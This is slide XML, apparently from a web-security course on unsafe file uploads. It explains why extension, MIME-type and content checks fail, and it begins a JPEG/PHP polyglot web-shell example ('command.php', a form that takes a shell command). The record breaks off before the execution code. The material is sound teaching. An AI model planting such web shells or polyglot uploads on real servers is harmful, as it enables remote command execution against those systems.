            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>File Headers:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Polyglots add things like JPEG headers to script files. Image manipulation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>libraries might report the file as an image, but the file can still be executed as a PHP file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>					</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="160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2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Unrestricted PHP Uploads (Fake Example)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1530" name="Google Shape;1530;p220"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1308925"/>
            <a:ext cx="2423250" cy="769125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1531" name="Google Shape;1531;p220"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5399575" y="1017725"/>
            <a:ext cx="2671127" cy="1027975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1532" name="Google Shape;1532;p220"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346963" y="1505338"/>
            <a:ext cx="144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54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Upload attack.php instead of a logo</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1533" name="Google Shape;1533;p220"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5155800" y="3098925"/>
            <a:ext cx="3676500" cy="5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54626A"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>def file_handler()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>	file.save(‘/var/www/logos/attack.php’)</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1534" name="Google Shape;1534;p220"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2565678"/>
            <a:ext cx="3378852" cy="2030553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1535" name="Google Shape;1535;p220"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2892125" y="1531713"/>
            <a:ext cx="2346600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1536" name="Google Shape;1536;p220"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5879525" y="2234050"/>
            <a:ext cx="0" cy="796500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1537" name="Google Shape;1537;p220"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3853375" y="3870625"/>
            <a:ext cx="2017500" cy="424200"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -429"/>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40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="571750"/>
            <a:ext cx="4044900" cy="208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Sensu Admin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="954" name="Google Shape;954;p140"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4880400" y="1152475"/>
            <a:ext cx="40449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seemed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>unlikely that Instagram would leave that token the same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> on their server, but if they did, I would be able to spoof session cookies.”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1"/>
              <a:t>Spoiler: They did</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="955" name="Google Shape;955;p140"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2661250"/>
            <a:ext cx="4044900" cy="11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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>researcher’s blog:</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221"/>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a:t>Check the file extension</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1543" name="Google Shape;1543;p221"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322850" y="470325"/>
            <a:ext cx="83535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Unsafe Upload Mitigations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that don’t work)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>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222"/>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strike="sngStrike"/>
              <a:t>Check the file extension</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>File extensions don’t have to be accurate. Many programs ignore them</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: Unzip will try to unzip any file with any extension</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1549" name="Google Shape;1549;p222"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322850" y="470325"/>
            <a:ext cx="83535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Unsafe Upload Mitigations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that don’t work)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>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223"/>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strike="sngStrike"/>
              <a:t>Check the file extension</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>File extensions don’t have to be accurate. Many programs ignore them</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: Unzip will try to unzip any file with any extension</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Check the MIME type</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1555" name="Google Shape;1555;p223"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322850" y="470325"/>
            <a:ext cx="83535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Unsafe Upload Mitigations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that don’t work)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>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24"/>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strike="sngStrike"/>
              <a:t>Check the file extension</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>File extensions don’t have to be accurate. Many programs ignore them</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: Unzip will try to unzip any file with any extension</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="54626A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" strike="sngStrike"/>
              <a:t>Check the MIME type</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The MIME type is sent by the user and cannot be trusted</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1561" name="Google Shape;1561;p224"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322850" y="470325"/>
            <a:ext cx="83535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Unsafe Upload Mitigations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that don’t work)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>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225"/>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a:t>Inspect the file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1567" name="Google Shape;1567;p225"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322850" y="470325"/>
            <a:ext cx="83535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Unsafe Upload Mitigations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(that don’t work)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>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226"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="388200" y="1065775"/>
            <a:ext cx="6907500" cy="39783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strike="sngStrike"/>
              <a:t>Inspect the file</a:t>
            </a:r>
            <a:endParaRPr strike="sngStrike"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Polyglots are scripts or code that is valid for multiple languages or schemas</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A JPEG/PHP polyglot, for example, is a file with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>JPEG header and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> PHP code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>command.php:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>ÿØÿà</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>&lt;form action="" method="get"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>	Command: &lt;input type="text" name="cmd" /&gt;&lt;input type="submit" value="Exec" /&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="4A86E8"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Output:&lt;br /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
